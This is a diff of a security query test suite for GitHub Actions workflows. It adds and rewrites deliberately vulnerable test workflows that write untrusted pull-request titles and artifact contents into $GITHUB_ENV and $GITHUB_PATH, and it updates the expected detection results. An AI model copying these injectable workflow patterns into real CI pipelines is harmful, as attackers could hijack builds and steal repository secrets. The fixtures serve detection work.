secrets.SONAR_TOKEN }} - with: - args: > - -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} - -Dsonar.projectKey=opencost_opencost - -Dsonar.organization=opencost - -Dsonar.branch.name=develop - -Dsonar.branch.target=develop - - uses: actions/github-script@v6 - with: - script: | - print("${{enb.SONAR_PR_NUM}}") - - name: SonarCloud Scan (PR) - uses: sonarsource/sonarcloud-github-action@master - if: env.SONAR_HEAD != 'develop' - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} - with: - args: > - -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} - -Dsonar.pullrequest.key=${{ env.SONAR_PR_NUM }} - -Dsonar.pullrequest.branch=${{ env.SONAR_HEAD }} - -Dsonar.pullrequest.base=${{ env.SONAR_BASE }} - -Dsonar.projectKey=opencost_opencost - -Dsonar.organization=opencost diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml index 3cab86f3171..c3c94755efd 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml @@ -1,27 +1,13 @@ -name: Pull Request Open +name: Test on: pull_request_target: - branches: - - main - - 14.0.x - - types: - - opened - - reopened jobs: - updateJira: - if: github.actor != 'dependabot[bot]' + test: runs-on: ubuntu-latest steps: - - name: Checkout repository - uses: actions/checkout@v4 - - - name: Extract Jira Key + - name: Code Injection, do not report as ENV VAR INJ run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV - - name: Sink - run: echo ${{ env.ISSUE_KEY }} - diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml index e71178c4ad6..c902b7e61bd 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml @@ -1,6 +1,4 @@ -# https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0 -# https://github.com/firebase/friendlyeats-web/commit/df65aefd24cf6f092a27a5576067ff9f29aa2ef1 -name: Deploy Preview +name: Test on: workflow_run: workflows: ["Generate Preview"] @@ -8,11 +6,8 @@ on: - completed jobs: - deploy: + test: runs-on: ubuntu-latest - if: > - ${{ github.event.workflow_run.event == 'pull_request' && - github.event.workflow_run.conclusion == 'success' }} steps: - name: 'Download artifact' uses: actions/github-script@v3.1.0 @@ -43,31 +38,6 @@ jobs: }); var fs = require('fs'); fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(downloadPr.data)); - fs.writeFileSync('${{github.workspace}}/firestore-web.zip', Buffer.from(downloadPreview.data)); - run: | unzip pr.zip echo "pr_number=$(cat NR)" >> $GITHUB_ENV - mkdir firestore-web - unzip firestore-web.zip -d firestore-web - - name: Deploy preview - id: deploy_preview - uses: FirebaseExtended/action-hosting-deploy@v0 - with: - repoToken: '${{ secrets.GITHUB_TOKEN }}' - firebaseServiceAccount: '${{ secrets.FIREBASE_SERVICE_ACCOUNT_FIR_CODELABS_89252 }}' - projectId: fir-codelabs-89252 - entryPoint: firestore-web - channelId: firestore-web-${{ env.pr_number }} - env: - FIREBASE_CLI_PREVIEWS: hostingchannels - - name: Write Comment - uses: actions/github-script@v3 - with: - github-token: ${{ secrets.GITHUB_TOKEN }} - script: | - await github.issues.createComment({ - owner: context.repo.owner, - repo: context.repo.repo, - issue_number: ${{ env.pr_number }}, - body: 'View preview ${{ steps.deploy_preview.outputs.details_url }}' - }); diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml index 2f76d4a3042..f76454c6088 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml @@ -1,17 +1,13 @@ -# https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project -# https://github.com/google/orbit/commit/6cd71a3f1eec098d0de61bf9bb742737cb3aa5fa -name: report-checks +name: Test on: workflow_run: workflows: ['checks'] types: - completed -permissions: read-all + jobs: - report-clang-tidy-diff: - permissions: - pull-requests: write + test: runs-on: ubuntu-latest steps: - name: Download PR metadata @@ -21,44 +17,7 @@ jobs: workflow_conclusion: '' name: pr_metadata if_no_artifact_found: 'ignore' - - name: Download clang_tidy_fixes - uses: dawidd6/action-download-artifact@e6e25ac3a2b93187502a8be1ef9e9603afc34925 # v2.24.2 - with: - workflow: ${{ github.event.workflow_run.workflow_id }} - workflow_conclusion: '' - name: clang_tidy_fixes - if_no_artifact_found: 'ignore' - - name: Set found_files - id: set_found_files - run: | - if [ -f clang-tidy-fixes.yml ] && [ -f pr_number.txt ] && [ -f pr_head_repo.txt ] && [ -f pr_head_ref.txt ]; then - echo "found_files=true" >> $GITHUB_OUTPUT - else - echo "found_files=false" >> $GITHUB_OUTPUT - fi - run: | echo "PR_NUMBER=$(cat pr_number.txt | jq -r .)" >> $GITHUB_ENV echo "PR_HEAD_REPO=$(cat pr_head_repo.txt | jq -Rr .)" >> $GITHUB_ENV echo "PR_HEAD_REF=$(cat pr_head_ref.txt | jq -Rr .)" >> $GITHUB_ENV - if: steps.set_found_files.outputs.found_files == 'true' - - uses: actions/checkout@v3 - if: steps.set_found_files.outputs.found_files == 'true' - with: - repository: ${{ env.PR_HEAD_REPO }} - ref: ${{ env.PR_HEAD_REF }} - persist-credentials: false - - name: Redownload clang_tidy_fixes - if: steps.set_found_files.outputs.found_files == 'true' - uses: dawidd6/action-download-artifact@e6e25ac3a2b93187502a8be1ef9e9603afc34925 # v2.24.2 - with: - workflow: ${{ github.event.workflow_run.workflow_id }} - workflow_conclusion: '' - name: clang_tidy_fixes - if_no_artifact_found: 'ignore' - - uses: platisd/clang-tidy-pr-comments@89ea1b828cdac1a6ec993d225972adea3b8841b6 - if: steps.set_found_files.outputs.found_files == 'true' - with: - github_token: ${{ secrets.ORBITPROFILER_BOT_PAT }} - clang_tidy_fixes: clang-tidy-fixes.yml - pull_request_id: ${{ env.PR_NUMBER }} - diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml index 1e4542b6318..733b15fc956 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml @@ -1,23 +1,20 @@ -name: Pull Request Open +name: Test on: pull_request_target: - branches: - - main - - 14.0.x - - types: - - opened - - reopened jobs: - updateJira: - if: github.actor != 'dependabot[bot]' + test: runs-on: ubuntu-latest steps: - - name: Checkout repository - uses: actions/checkout@v4 - + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + echo "PR_TITLE=$TITLE" >> $GITHUB_ENV + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV - env: TITLE: ${{ github.event.pull_request.title }} run: | @@ -42,9 +39,11 @@ jobs: echo "$TITLE" >> "$GITHUB_ENV" echo EOF } >> "$GITHUB_ENV" - - run: | + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | cat <<-"EOF" >> "$GITHUB_ENV" - echo "$TITLE" + echo "FOO=$TITLE" EOF diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml new file mode 100644 index 00000000000..cfc5e6ef1fa --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml @@ -0,0 +1,36 @@ +name: Test +on: + workflow_run: + workflows: ["Build/Test"] + types: [completed] +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: 'Download code coverage' + uses: actions/github-script@v7 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "oc-code-coverage" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); + - name: 'Unzip code coverage' + run: unzip oc-code-coverage.zip -d coverage + - name: set env vars + run: | + echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV + echo "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV + echo "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected index 6d9801ccd81..d3b90de71e3 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected @@ -1,10 +1,20 @@ edges -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:9:26:6 | Run Step | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:26:9:29:41 | Run Step | +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | nodes -| .github/workflows/path1.yml:11:21:11:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | semmle.label | echo $PATHINJ >> $GITHUB_PATH | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | semmle.label | echo ${PATHINJ} >> $GITHUB_PATH | | .github/workflows/path1.yml:21:9:25:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/path1.yml:25:9:26:6 | Run Step | semmle.label | Run Step | -| .github/workflows/path1.yml:26:9:29:41 | Run Step | semmle.label | Run Step | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | semmle.label | echo "$(cat foo/bar)" >> $GITHUB_PATH | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index 0c4574a77cb..56345ca896a 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected @@ -1,16 +1,31 @@ edges -| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | -| .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | -| .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | -| .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes -| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test2.yml:17:9:47:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test2.yml:47:9:52:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | semmle.label | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected new file mode 100644 index 00000000000..2dfa8702d59 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected @@ -0,0 +1,26 @@ +edges +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | +nodes +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | semmle.label | echo $PATHINJ >> $GITHUB_PATH | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | semmle.label | echo ${PATHINJ} >> $GITHUB_PATH | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | semmle.label | echo "$(cat foo/bar)" >> $GITHUB_PATH | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | +subpaths +#select +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref new file mode 100644 index 00000000000..ba2d522c03d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref @@ -0,0 +1 @@ +Security/CWE-077/PrivilegedEnvPathInjection.ql diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected index 6dbe7bf3c93..f88785c38e1 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected @@ -1,21 +1,40 @@ edges -| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | -| .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | -| .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | -| .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes -| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test2.yml:17:9:47:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test2.yml:47:9:52:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt 